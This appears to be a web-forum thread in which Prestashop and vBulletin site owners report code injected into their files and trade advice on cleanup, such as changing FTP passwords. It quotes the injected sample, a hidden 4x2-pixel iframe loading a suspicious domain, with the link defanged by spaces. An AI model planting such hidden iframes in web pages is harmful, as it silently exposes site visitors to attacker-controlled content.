How did this happen?

Getting this added to the bottom of several files and causing problems.

How is this happening and what can I do about it?

We don’t run a CMS, we run Prestashop, however, they are both older versions.
We did get this on one site that did not have Prestashop installed, too.

Any ideas?

{I put spaces in the link so people wouldn’t get the warnings)


<iframe src="http : // eiueuiuewi.com /7JF8963DH53SJ4/" width="4" height="2"></iframe>

IP address: 77.78.240.154


Whois Info:
Registrant Contact:
   Whois Privacy Protection Service
   Whois Agent lqapuikhdg@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Administrative Contact:
   Whois Agent lqapuikhdg@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Technical Contact:
   Whois Agent lqapuikhdg@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

Billing Contact:
   Whois Agent lqapuikhdg@whoisservices.cn
   +86.05922577888 fax: +86.05922577111
   Xiamen Software Park shengshi Building
   xiamen fujian 361005
   cn

I joined this forum to tell you that my vBulletin forum (vBulletin 3.6.7) has also been attacked in the past 24 hours with the same code. The code was placed either before the vBulletin code or after. This prevented the vBulletin scripts from running properly so members couldn’t view threads or login.

I’ve since changed the FTP User password. I suggest you do the same.

When removing the unwanted code ensure there is no whitespace before <?php and no whitespace after ?>

Perhaps you should talk to your web host. You may have been invaded by a spammer. :frowning:

I know that my logs don’t show anything at all. I think it was a HOST problem that I didn’t get notified about.